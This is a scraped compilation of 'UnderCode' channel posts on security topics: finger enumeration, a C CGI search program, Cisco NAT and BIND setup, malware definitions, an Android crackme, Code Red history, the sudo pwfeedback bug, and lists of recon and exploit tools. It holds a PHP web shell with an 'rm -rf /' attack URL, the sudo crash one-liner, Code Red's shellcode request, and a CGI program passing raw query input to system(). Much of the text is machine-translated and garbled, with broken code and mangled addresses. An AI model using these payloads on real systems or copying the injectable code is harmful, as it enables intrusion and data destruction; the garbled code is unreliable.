▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Unix administrative security :
t.me/UnderCodeTesting

PART 2 :

> Easy to go wrong

finger is a very common tool on the UNIX platform. The purpose of using it is to provide users with some relevant information on a given system. The most problematic part of a Unix host is fingerd, which is the daemon for finger. Its working principle is described in many UNIX books, but its disadvantage is that there are too many messages. A person skilled in using finger can break a fingerd machine in a short period of time. This is not alarmist. Finger of SUN Solaris can provide all online user names and all user names on the host. User information. For example, I make a finger request to a SUN machine and query the root status. If its fingerd is not closed or replaced, it will tell me the following information:
Login name: root In real life: Super-User

Directory: / Shell: / sbin / sh

Last login Fri Mar 26 16:54 on pts / 2

New mail received Sat Mar 27 23:10:37

🦑 So I can get the following information :

(1) The real name of root is Super-User (some hard-working system administrators will write their own names here, and set the root password to their own name !!);

(2) The root directory of root is at / next, sometimes after hacking a machine as a normal user find / etc / passwd is the root to read and write, so he can get the majority of users on the host name by viewing the user directory;

(3) the environment is the root of Shell / sbin / sh, if it is / bin / passwd, it proves that the user can only change the password when logging in to the host;

(4) The last time root logged into the machine was at 2019.3.26 16:54;

(5) A new letter from root arrived at 2019.3.26, but he has not seen the letter since 2018.12.23.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Programming Techniques-Self-made c language compiled cgi to achieve search C language to achieve self-compiled cgi search

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Environmental
/ usr / local / apache / htdocs / ( to be retrieved files Under this directory)
/ usr / local / apache / temp / (as a transit folder)
/ usr / local / apache / cgi-bin /

2) Place the a.out generated by gcc search.c in / usr / local / In apache / cgi-bin /, the permission is set to nobody
to execute.

3) chown -R nobody.nobody / usr / local / apache / temp

4) Add a file deletetemp permission in /etc/cron.daily to 555
rm -f / usr / local / apache / temp / *

5) In / Add a file myetc permission in etc / cron.hourly to 555
updatedb -U / usr / local / apache / htdocs

6) Delete the

appendix (a total of 2) of a file locate.cron in /etc/cron.daily :

a) index .htm source
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>

<body>
<p>...</p>
<form name="form1" action="http://129.158.217.223/cgi-bin/a.out">
<p> </p>
<p>
<input name="keyname" value="" type=text>
</p>
<p>
<input type="submit" value="...">
</p>
</form>
<p> </p>
</body>
</html>

2. search.com
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <fcntl.h>

int main(int argc, char* argv[])
{
int fd;
int status;
time_t i;
char cFileName[64];
char cTempName[64];
char cBuffer[1024];
char *p = cBuffer;
char cContent[10240];

char *data;
char keyword[1024];
data = getenv("QUERY_STRING");
if(data==NULL)
{
printf("Content-Type:text/html ");
printf("not found!");
exit(1);
}

sscanf(data, "keyname=%s&", keyword);

p += sprintf(p, "locate '%s' | sed -e 's#^/usr/local/apache/htdocs#http://129.158.217.223#' | sed -e 's#^.*$#<a href=&>&</a>
#' > ", keyword);
i = time(NULL);

sprintf(cTempName, "%d.html", i);
sprintf(cFileName, "/usr/local/apache/temp/%d.html", i);
strcat(cBuffer, cFileName);
cBuffer[1024-1]=0;

system(cBuffer);
fd = open(cFileName, O_RDWR);
status = read(fd, cContent, sizeof(cContent)-1);
close(fd);

printf("Content-Type:text/html ");
printf("<meta http-equiv=refresh content=0;url="http://129.158.217.223/temp/%s"> ", cTempName);
printf("Waiting....................... ");
printf("%s", keyword);
return 0;
}

Written by uNDERCoDE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Configuration examples of proxy server and router in LAN FOR ANONYMITY REASONS BY UNDERCODE
instagram.com/UndercOdeTestingCompany

PART 1

> rapid development of network technology, so that enterprises LAN access INTERNET more and more ways to share resources, For the most part,

> DDN special line with its stable performance, expansion The advantage of good performance has become a commonly used method.

>The DDN connection is simple in terms of hardware requirements. It only needs a router and a proxy server. However, many of the system configuration Network management is a more difficult problem. The following takes CISCO router as an example, the author introduces several successful configuration methods for reference by colleagues:
First, the configuration of accessing Internet resources directly through the router

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

A)`1) The general idea and the equipment connection method
In general, Internal LAN use reserved addresses on the INTERNET:
10.0.0.0/8:10.0.0.0~10.255.255.255
172.16.0.0/12:172.16.0.0~172.31.255.255
192.168. 0.0 / 16: 192.168.0.0 ～ 192.168.255.255
Under normal circumstances, when the workstations in the unit directly use the route for external access, they will be filtered out by the router because the workstations use the reserved addresses on the Internet, resulting in inaccessibility Internet resources. The solution to this problem is to use the NAT (Network Address Translation) address translation function provided by the routing operating system to convert the private address of the intranet into a legal address on the Internet, so that users without legal IP addresses can access it through NAT. External Internet. This has the advantage of not requiring a proxy server, reducing investment, saving legal IP addresses, and improving the security of the internal network.

2) There are two types of NAT: Single mode and global mode.
Using single mode of NAT, just like its name, you can map many local LAN hosts to one Internet address. All hosts in the local area network are regarded as an Internet user to the external Internet network. Hosts within the local area network continue to use local addresses.
Using the global mode of NAT, the interface of the router maps a large number of local LAN hosts to a certain Internet address range (IP address pool). When the local host port is connected to a host on the Internet, an IP address in the IP address pool is automatically assigned to the local host. After the connection is interrupted, the dynamically assigned IP address will be released, and the released IP address can be used by other local hosts. use.

3) The following takes the network environment of my organization as an example to list the configuration method and process for your reference.

4) Our unit uses Unicom optical cable (V.35) to access the Internet. The router is CISCO2610. The LAN uses an INTEL550 100M switch. Unicom provided us with the following four IP addresses:
211.90.137.25 (255.255.255.252) for local use The router's WAN port
211.990.137.26 (255.255.255.252) is used by the other party (China Unicom) port
211.990.139.41 (255.255.255.252) for its own control
211.990.139.42 (255.255.255.252) for its own control

Written by uNDERCoDE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Configuration examples of proxy server and router in LAN FOR ANONYMITY REASONS BY UNDERCODE
fb.com/UndercOdeTestingCompany

PART 2

B) 1 ) configuration of the router

config T
IP NAT the pool c2610 211.90.139.41 211.90.139.42 Netmask 255.255.255.252
(Define an address pool c2601, within which includes two free legal IP address for NAT use conversion)
int E0 / 0
IP address 192.168.0.3 255.255.255.0
IP NAT inside
Exit

> (provided the IP address of the Ethernet port, and set its internal network to connect the port)
interface S0 / 0
IP address 211.90.137.25 255.255.255.252
ip nat outside
exit
(Set the IP address of the WAN port and set it as the port to connect to the external network)
ip route 0.0.0.0 0.0.0.0 211.90.137.26
(Set dynamic routing)
access-list 2 permit 192.168.0.1 0.0.0.255
(establish an access control list )
! Dynamic NAT
!

2) Ip nat inside source list 2 pool c2610 overload
(establish dynamic address translation)
line console 0
exec-timeout 0 0
!
Line vty 0 4
end
wr
(Save the settings)

3) Workstation configuration
requires static IP address, set in the TCP / IP properties and set off to network 192.168.0.3 (the IP address of the router Ethernet port), the address is provided, the Internet browser and other tools to provide access to the DNS in No special settings are required.
Second, access to INTERNET resources through a proxy server configuration

Written by uNDERCoDE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to stop and remove viruses and other malware
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) What is a computer virus?

A computer virus is a small software program that can spread from one computer to another and interfere with the operation of the computer. Computer viruses can damage or delete data on your computer, use an email program to spread viruses to other computers, or even delete everything on your hard drive.

2) Computer viruses usually spread through attachments in e-mail messages or instant messaging messages. Therefore, never open an e-mail attachment unless you know the identity of the sender or this is exactly the e-mail attachment you are looking for. Viruses can disguise themselves as funny pictures, greeting cards, or attachments in audio and video files. Computer viruses are also spread through Internet downloads. They can be hidden in pirated software or other files or programs you download.


3) Computer virus symptoms

For information about computer virus symptoms, go to the
Microsoft Computer Security website.
> detailed ...


4)What is a worm?

A worm is a type of computer code that can spread without user interaction. Most worms start as email attachments and infect computers once opened. The worm scans files on the infected computer that contain email addresses, such as address books or temporary web pages. The worm will use these addresses to send infected emails, and it will often mimic (or spoof) the "sender" address in subsequent emails to make the infected messages appear to come from people they know. The worm then spreads automatically via email, network, or operating system vulnerabilities, often crushing the system before knowing why. Worms don't always damage computers, but they often cause performance and stability issues on computers and networks.

5) What is a Trojan horse?

Trojan horse is a malware program hidden inside other programs. When it enters your computer, it is hidden in legitimate programs such as screen savers. It then places code into the operating system that gives hackers access to the affected computer. Trojan horses usually do not spread on their own. They can spread through viruses, worms, or downloaded software.

6) What is spyware?

Spyware can be installed on your computer without your knowledge. These programs can change your computer configuration or collect advertising data and personal information. Spyware can track Internet search habits, or it can redirect your web browser to other websites that you didn't plan to visit.


7) What is rogue security software?

Rogue security software programs try to make you think your computer is infected with a virus and usually prompts you to download or buy a product to remove the virus. The names of these products often include words such as antivirus, protection, security, protection or repair. This approach makes them sound legitimate. They usually run immediately after you download or the next time you start your computer. Rogue security software prevents applications such as Internet Explorer from opening. Rogue security software may also show legitimate important Windows files as infections. Typical error messages or pop-up messages may include the following phrases:

caveat!
Computer is infected!
This computer is infected with spyware and adware.

🦑 What is malware?

Malware is designed to damage computer systems or take unnecessary action. Here are some examples of malware:
virus
worm
Trojan horse
Spyware
Rogue security software

@UndercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 change your Internet Explorer proxy settings yourself, follow these steps:
twitter.com/UNdercOdetc

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Click "start"And click "Run".

2) In "run"Box, copy and paste the following:
reg add "HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Internet Settings" / v ProxyEnable / t REG_DWORD / d 0 / f

3) Click "OK".

4) Click "start"And click "Run".

5) In "run"Box, copy and paste the following:
reg delete "HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Internet Settings" / v ProxyServer / f

6) Click "OK".

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑DOMAINE NAME SERVICES :
DNS Configuration Reference
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> As we all know, the DNS system used on the Internet was bind4, and
bind8 is the latter version of bind4. And bind4 compared, bind8 better, managers
can more fully control its behavior, but the difference between the two is still very large, changing
not only the format, you can have a lot of new concepts. The statements available in bind8 are logging,
options, zone, acl, key, trusted-keys, server, controls, include.
The instructions in it can be in the format of c, c ++, or shell / perl. I would like to introduce major
primary, secondary domain name server method of basic configuration to work with bind8 (they are on the internet
two kinds of domain name servers used mainly), if interested can refer to a deeper understanding of man and
RFC 882, RFC 883 , RFC 973, RFC 974, RFC 1033, RFC 1034, RFC1035,
RFC 1123, RFC 2308 "Name Server Operations Guide for BIND".

🦑 Necessary conditions for the master DNS server to work properly:

1) Install the bind8 software, which is available in many unix distributions You can find it in version,
or go to http://freesoft.online.sh.cn ,
ftp://studio.sinet.net.cn .

2) Several required configuration files:
named.conf
named.ca
named.local
mater file (that is, the zone file

in bind4) Among these configuration files, the most important is named.conf. Under / etc,
it is the default startup file when named is started. A typical The named.conf file includes at least
options, and zones. For example:

options {
directory "/ var / named";
};

zone "0.0.127.in-addr.arpa" in {
type master;
file "named.local";
};

"." Zone in {
type hint;
File "the named.ca";
};

Zone "99.cn.net" in {
type Master;
File "db.99.cn.net";
};

3) in it, options to define the path of the master file is stored, corresponds to a certain
field, here will find the named data files, require a www.example.. if the request,
the named will arrive at / var / named find db.exa .ample. net this file, find the ip of www.example...
zone define a domain, such as exa.mple.net this field, type type custom domain name server, master
stated that this is a primary domain name server, the first zone is defined as a local server to send back its own domain
master server, will address 127.0 .0.1 mapping to localhost, in almost all types of domain name servers where
you can see all this domain.

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ NEWS ▄ ▂ ▁


1) We Start Using Pinterest
pinterest.com/UndercOdeOfficial


2) After 3 ban at github.com we decide to get another pro github account :
github.com/UndercOdeOfficial


🦑 Some Follow From you will appreciate it 😊
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ NEWS ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Android Hacking- Simple algorithm analysis
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

New to Android dynamic debugging, and decided to use

1) First of all, without anti-debugging, he would not pretend to be cut off) Run the apk, enter the verification code, and pop up


2) Then use JEB to analyze the apk file to find the character string "Sorry, Fish!", Find the verification process, and find the verification function EatRice

3) So in libxy.so, find the function as follows. The dynamic debugging finds that the program first determines whether the first character of the input string is 'X' (0x58), whether the second character is '#' (0x23), and whether the string length Is 7, if these conditions are not met then wait 3s and then return 0. From this, it is judged that the verification code format should be: "X # -----", where "-" represents a temporarily unknown character. It is assumed here that the name of the string is szA.

4) The debugger finds that the program will calculate szA [1: 2], szA [2: 3], szA [3: 4], szA [4: 5], szA [5: 6] respectively and perform the calculation with the corresponding results. By comparison, if the results are correct, it is considered successful.

5) pecific algorithm is not described. Let ’s look at the program. Let ’s talk about the cracking process. Since the algorithm involves some shifts and feedback, it is difficult to push backwards (personally think) However, in the algorithm, the operation is performed once every two bits and each bit is a visible character (0x21 ~ 0x7e). Therefore, the idea here is to
explode bit by bit. In this example, when calculating szA [1: 2], szA [1] = '#' is known. Then szA [2] can be blasted,
and szA [2] is known during the calculation of szA [2: 3], szA [3]
can be blasted , and so on, the value of each bit can be blasted ,
And the calculation time complexity should also be O (1), that is, a maximum of (0x7e-0x21) * 5 = 0x1d1 operations to calculate the answer

🦑 will send later other parts
Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TOPIC HACKERS SCRIPTS - KALI -TERMUX at GITHUB
Twitter.com/UndercOdeTC

🦑 Active Intelligence Gathering

1) EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. https://github.com/ChrisTruncer/EyeWitness

2) AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for loot. https://github.com/jordanpotti/AWSBucketDump

3) AQUATONE is a set of tools for performing reconnaissance on domain names. https://github.com/michenriksen/aquatone

4) spoofcheck a program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. https://github.com/BishopFox/spoofcheck

5) Nmap is used to discover hosts and services on a computer network, thus building a "map" of the network. https://github.com/nmap/nmap
dnsrecon a tool DNS Enumeration Script. https://github.com/darkoperator/dnsrecon

6) dirsearch is a simple command line tool designed to brute force directories and files in websites. https://github.com/maurosoria/dirsearch

7) Sn1per automated pentest recon scanner. https://github.com/1N3/Sn1per

8) Social Mapper OSINT Social Media Mapping Tool, takes a list of names & images (or LinkedIn company name) and performs automated target searching on a huge scale across multiple social media sites. Not restricted by APIs as it instruments a browser using Selenium. Outputs reports to aid in correlating targets across sites. https://github.com/

9) SpiderLabs/social_mapper
skiptracer OSINT scraping framework, utilizes some basic python webscraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget. https://github.com/xillwillx/skiptracer

10) FOCA (Fingerprinting Organizations with Collected Archives) is a tool used mainly to find metadata and hidden information in the documents its scans. https://github.com/ElevenPaths/FOCA

11) theHarvester is a tool for gathering subdomain names, e-mail addresses, virtual hosts, open ports/ banners, and employee names from different public sources. https://github.com/laramies/theHarvester

12) Metagoofil is a tool for extracting metadata of public documents (pdf,doc,xls,ppt,etc) availables in the target websites. https://github.com/laramies/metagoofil

E N J O Y
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Dangerous Virus Code Red (computer worm)
> server attack
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Code Red was a computer worm observed on the Internet on July 15, 2001. It attacked computers running Microsoft's IIS web server.

2) The Code Red worm was first discovered and researched by eEye Digital Security employees Marc Maiffret and Ryan Permeh when it exploited a vulnerability discovered by Riley Hassell. They named it "Code Red" because Code Red Mountain Dew was what they were drinking at the time.

🦑 Exploited vulnerability

3) The worm showed a vulnerability in the growing software distributed with IIS, described in Microsoft Security Bulletin MS01-033,[3] for which a patch had been available a month earlier.

4) The worm spread itself using a common type of vulnerability known as a buffer overflow. It did this by using a long string of the repeated letter 'N' to overflow a buffer, allowing the worm to execute arbitrary code and infect the machine with the worm. Kenneth D. Eichman was the first to discover how to block it, and was invited to the White House for his discovery.

🦑Worm payload:

5) The payload of the worm included:

> Defacing the affected web site to display:
HELLO! Welcome to http://www.worm.com! Hacked By xy

6) Other activities based on day of the month:

> Days 1-19: Trying to spread itself by looking for more IIS servers on the Internet.

> Days 20–27: Launch denial of service attacks on several fixed IP addresses. The IP address of the White House web server was among those.[2]

> Days 28-end of month: Sleeps, no active attacks.

7) When scanning for vulnerable machines, the worm did not test to see if the server running on a remote machine was running a vulnerable version of IIS, or even to see if it was running IIS at all. Apache access logs from this time frequently had entries such as these:

GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNN
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3
%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
The worm's payload is the string following the last 'N'. Due to a buffer overflow, a vulnerable host interpreted this string as computer instructions, propagating the worm.

powred by wiki
Posted On UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 news from twitter.com/UndercOdeTC
> XRed virus attack on a company's (special in europ) remote office during the holiday season

1) Tencent Enterprise Security Emergency Response Center (hereinafter referred to as Tencent Security) received a request from an Internet company.
> A remote business tool and spreadsheet file shared by an internal business group of the company's internal work group was found to be infected with a virus, causing more than 200 employees' computers in the department. Being infected, the company was concerned that the security of the system's business was threatened.

🦑Troubleshoot the source of virus infection:

1) The company's early internal investigation: The company's network administrator noticed that the exe file of the remote office tool in the compressed package shared by an employee through the internal working group was infected, and the remote office tool exe provided by the company was a normal file. Therefore, the source of virus transmission is basically confirmed.

2) Tencent security engineer conducted a remote investigation on this and found that the computer suspected of being infected has the following phenomena:

a) Unzip the file on this computer and find that the uncompressed exe file is larger than the original file and has been infected.

b)Copy any exe file to the desktop and the exe file will be infected. After the infection, the file description is modified into a touchpad device driver. Based on this, it can be basically confirmed that the virus is the "Synaptics" worm that has been disclosed by peers.

c) Continued inspections revealed that the cracked version of the compression software on this poisoned computer did not find any “supply chain pollution” issues. Basically, it can be confirmed that this personal computer was infected with XRed virus some time ago earlier. In this emergency, it was used as a work computer for remote office use. When sharing files externally, it was monitored by the company's IT staff and found abnormal.

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Third, block virus transmission and repair programs :
(special X-Red Virus )
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) The company's IT staff immediately disconnected the infected machine from the network to prevent further spread.

2) After confirming that the computer housekeeper Cloud Master Defense can intercept the pathogen "Synaptics.exe", it immediately requested that computers without "Tencent T-sec Terminal Security Management System" be installed to install Tencent Computer Housekeeper.

3) The pathogen "Synaptics.exe" has more than 20,000 variants. The latest update was January 2020.

4) It is still active and it is recommended that companies upgrade anti-virus software in time to take precautions.

5) For infected computers, use Tencent Computer Manager (or Tencent T-sec Terminal Security Management System) to conduct a comprehensive check and repair of infected files. The XRed virus infection method is relatively special (for details, please refer to the "Detailed Analysis of Samples" section below). Tencent Computer Butler can accurately identify and repair it perfectly and restore the infected file to its original state.

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 everyOne should take care from X-RED MALWARE, HIS ACTIVITY STARTED SINCE JAN 2020

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 Vulnerabilty from twitter.com/UndercOdeTC
> Sudo vulnerability allows unprivileged Linux and macOS users to run commands as root

🦑 cyber-security-3400657_640
Sudo vulnerability allows unprivileged Linux and macOS users to run commands as root
Author: @UndercOdeOfficialn Date: 2020-02-04 Category: security alerts , vulnerability events


> Apple security expert Joe Vennix has discovered a vulnerability (CVE-2019-18634) that allows unprivileged Linux and macOS users to run commands as root.

> This vulnerability can only be exploited in special configurations.

> The vulnerability can only be exploited if the "pwfeedback" option has been enabled in the sudo configuration file. The pwfeedback option for root allows visual feedback when the user enters a password.

> Experts point out that this vulnerability can be triggered even if the user is not in the user file.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) "You do not need root privileges to trigger this vulnerability, you just need to enable pwfeedback." Sudo developer Todd C. Miller wrote.

2) "When entering the password, you can enter sudo through the pipe to reproduce it. For example:"

$ perl -e 'print (("A" x 100. "\ x {00}") x 50)' | sudo -S id
Password: Segmentation fault
There are two reasons for this vulnerability:

3) The pwfeedback option is generally not ignored when reading from devices other than the terminal device. Due to the lack of a terminal, the version of the line erase character is always an initial value of 0.
If there is a write error, the code that erases the asterisk line will not reset the buffer position correctly, but it will reset the remaining buffer length. This will cause the getln () function to be written outside the buffer. "

4) If this option is enabled, you can change "Defaults pwfeedback" to "Defaults! Pwfeedback" in the user profile.

5) The sudo maintainer released version 1.8.31 of root.

"Although there are logic errors in the 1.8.26 to 1.8.30 versions of sudo, the vulnerabilities could not be exploited due to changes in EOF processing after 1.8.26." Miller explained.

6) In October 2019, Vennix discovered a Sudo bypass issue. Even if "sudo user configuration" does not allow root access, a malicious user or malicious program can still execute arbitrary commands as the root user on the target Linux system, and this big is patched on undercode os today/and in debian yesterday

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TOP EXTREMLY DAGEROUS HACKING TOOLS/ accounts-cards-modding... TERMUX-KALI-PARROT...

> EXPLOITE TOOLS 2019-2020
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) WinRAR Remote Code Execution Proof of Concept exploit for CVE-2018-20250. https://github.com/WyAtu/CVE-2018-20250

2) Composite Moniker Proof of Concept exploit for CVE-2017-8570. https://github.com/rxwx/CVE-2017-8570

3) Exploit toolkit CVE-2017-8759 is a handy python script which provides pentesters and security researchers a quick and effective way to test

4) Microsoft .NET Framework RCE. https://github.com/bhdresh/CVE-2017-8759
CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum. https://github.com/unamer/CVE-2017-11882

5) Adobe Flash Exploit CVE-2018-4878. https://github.com/anbai-inc/CVE-2018-4878

6) Exploit toolkit CVE-2017-0199 is a handy python script which provides pentesters and security researchers a quick and effective way to test

7) Microsoft Office RCE. https://github.com/bhdresh/CVE-2017-0199
demiguise is a HTA encryption tool for RedTeams. https://github.com/nccgroup/demiguise

8) Office-DDE-Payloads collection of scripts and templates to generate Office documents embedded with the DDE, macro-less command execution technique. https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads

9) CACTUSTORCH Payload Generation for Adversary Simulations. https://github.com/mdsecactivebreach/CACTUSTORCH

10) SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. https://github.com/mdsecactivebreach/SharpShooter

11) Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. https://github.com/Mr-Un1k0d3r/DKMC

12) Malicious Macro Generator Utility Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape
mechanism. https://github.com/Mr-Un1k0d3r/

13) MaliciousMacroGenerator
SCT Obfuscator Cobalt Strike SCT payload obfuscator. https://github.com/Mr-Un1k0d3r/SCT-obfuscator
@UndercOdeTesting
14) Invoke-Obfuscation PowerShell Obfuscator. https://github.com/danielbohannon/Invoke-Obfuscation

15) Invoke-CradleCrafter PowerShell remote download cradle generator and obfuscator. https://github.com/danielbohannon/Invoke-CradleCrafter

16) Invoke-DOSfuscation cmd.exe Command Obfuscation Generator & Detection Test Harness. https://github.com/danielbohannon/Invoke-DOSfuscation

17) morphHTA Morphing Cobalt Strike's evil.HTA. https://github.com/vysec/morphHTA
Unicorn is a simple tool for using a PowerShell downgrade attack and

18) inject shellcode straight into memory. https://github.com/trustedsec/unicorn

U S E FOR Learning Only !!!!
@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Hacking an Ubuntu Linux System with PHP :
instagram.com/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> In this practical scenario, we will provide you with basic information on how to use PHP to disrupt Linux.
> We will not target any victims. If you want to try it out, you can install LAMPP on your local computer.

1) PHP comes with two functions that can be used to execute Linux commands. It has exec () and shell_exec () functions. The function exec () returns the last line of command output, while shell_exec () returns the entire result of the command as a string.

2) For demonstration purposes, let us assume that the attacker administrator uploads the following files on a web server.

<? PHP $ cmd = isset ($ _ GET ['cmd'])? $ _GET ['cmd']: 'ls -l'; echo "execute a shell command:-> $ cmd </ br>"; $ output = shell_exec ($ cmd); echo "
<pre> $ output </ pre> ";? > Here above script gets commands from the GET variable named cmd in. The command is executed using shell_exec () and returns the result in the browser. You can use the above code HTTP using the following URL : //localhost/cp/konsole.php CMD = LS% 20 liters


3) "... konsole.php? Cmd = ls% 20-l" assigns the value ls -l to the variable cmd .
The command executed against the server will be

4) See That Picture By UndercODE

> The above command only shows the files and permissions in the current directory.
Assuming the attacker passes the command

rm -rf /
here,
"Rm" delete file
"Rf" causes the rm command to run in recursive mode. Delete all folders and files
"/" Instructs the command to start deleting files from the root directory
The attack URL looks like this
HTTP: //localhost/cp/konsole.php CMD = RM% 20-RF% 20 /

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁